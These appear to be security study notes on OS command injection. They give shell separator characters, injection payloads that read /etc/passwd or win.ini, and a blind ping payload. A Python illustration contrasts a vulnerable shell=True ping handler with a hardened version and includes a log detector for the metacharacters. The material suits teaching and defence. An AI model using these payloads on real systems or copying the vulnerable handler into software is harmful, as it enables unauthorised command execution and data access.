Command injection

Command injection occurs when a flaw in a web application lets an attacker execute arbitrary OS commands on the host. It typically arises because user input is passed into a command line without proper sanitization, allowing attackers to alter or append to the command that gets executed.
  • To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands
  • Use command line symbols in input fields to test for command injection
    • ; (used to separate commands in Bash)
    • |
    • || (second command runs if first fails)
    • &
    • && (second command runs if first succeeds)
    • >
    • >>
  • Be sure to use commands specific to the target OS
    • cat vs. type
    • ping vs. ping -c (Windows ping stops after 4 echo requests by default; Linux ping needs -c <count> or it runs until interrupted)
    • ls vs. dir

Payloads

  • command; id
  • command && whoami
  • command || ls (or dir depending on OS)
  • command; cat /etc/passwd
  • command; type C:\Windows\win.ini

Blind

  • command; ping -c5 $ipaddress
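Added illustration (not part of these notes) of the two sides of what the sections above describe: a web handler that splices user input into a shell command string (the flaw the test characters and payloads exploit) next to the hardened form (allow-listed input passed as an argv list with no shell), plus a check that flags the metacharacters from the list above in request parameters. The ping handler, the hostname regex and the request log lines are assumptions constructed for the example.

```python
import re
import subprocess
from urllib.parse import unquote, urlsplit

# Shell metacharacters from the test list above, plus a few more that change
# how a shell parses a command line (backtick and $ for substitution, newlines).
SHELL_METACHARACTERS = (";", "|", "&", ">", "<", "`", "$", "\n", "\r")


def find_shell_metacharacters(value: str) -> list[str]:
    """Return the metacharacters present in a user-supplied value, in order of
    first appearance. Usable as an input validator and as a log detection rule."""
    found: list[str] = []
    for ch in value:
        if ch in SHELL_METACHARACTERS and ch not in found:
            found.append(ch)
    return found


# --- Vulnerable pattern (assumed handler, for illustration) ------------------
# User input is spliced into a command string that is handed to a shell.
# build_ping_command_unsafe only BUILDS the string so the effect is visible
# without executing anything: with "192.0.2.10; id" the shell sees two commands.
def build_ping_command_unsafe(host: str) -> str:
    return f"ping -c 5 {host}"


def run_ping_unsafe(host: str) -> subprocess.CompletedProcess:
    # Do not use in real code: shell=True lets ';', '&&', '|' etc. in `host`
    # start additional commands with the web server's privileges.
    return subprocess.run(build_ping_command_unsafe(host), shell=True,
                          capture_output=True, text=True)


# --- Hardened pattern --------------------------------------------------------
# 1. Allow-list the input against a strict hostname / dotted-IPv4 grammar.
# 2. Pass the command as an argv list with shell=False, so no shell parses it.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*$")


def is_valid_host(host: str) -> bool:
    """True only for a syntactically valid hostname or dotted IPv4 address.
    Metacharacters, whitespace, empty strings and a leading '-' (which ping
    would read as an option) are all rejected."""
    return bool(HOSTNAME_RE.match(host))


def build_ping_argv(host: str) -> list[str]:
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "5", host]


def run_ping_safe(host: str) -> subprocess.CompletedProcess:
    # argv list + shell=False: the host is one argument to ping and is never
    # interpreted by a shell.
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, text=True)


# --- Detection over constructed request log lines ---------------------------
# Constructed sample request lines (not from any real system), "path?query" form.
SAMPLE_REQUESTS = [
    "/tools/ping?host=192.0.2.10",
    "/tools/ping?host=192.0.2.10;id",
    "/tools/ping?host=192.0.2.10&&whoami",
    "/tools/ping?host=192.0.2.10||ls",
    "/tools/lookup?name=example.com",
]


def flag_suspicious_requests(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (line, metacharacters) for every request whose parameter value
    contains shell metacharacters after URL-decoding."""
    flagged = []
    for line in lines:
        query = urlsplit(line).query
        # Split on the first '=' only; an unencoded '&&' in the value is kept
        # on purpose, because that is exactly the signal being looked for.
        value = unquote(query.split("=", 1)[1]) if "=" in query else query
        metas = find_shell_metacharacters(value)
        if metas:
            flagged.append((line, metas))
    return flagged


if __name__ == "__main__":
    print("shell sees:", build_ping_command_unsafe("192.0.2.10; id"))
    print("safe argv: ", build_ping_argv("192.0.2.10"))
    for line, metas in flag_suspicious_requests(SAMPLE_REQUESTS):
        print("flagged:", line, metas)
```

The allow-list regex does the real work: because it only admits characters that can appear in a hostname, none of the separators from the test list can reach the command at all, and shell=False means that even an unexpected value is a single argument rather than a command line. The detector is the same check turned around, pointed at request logs to spot someone probing with those separators.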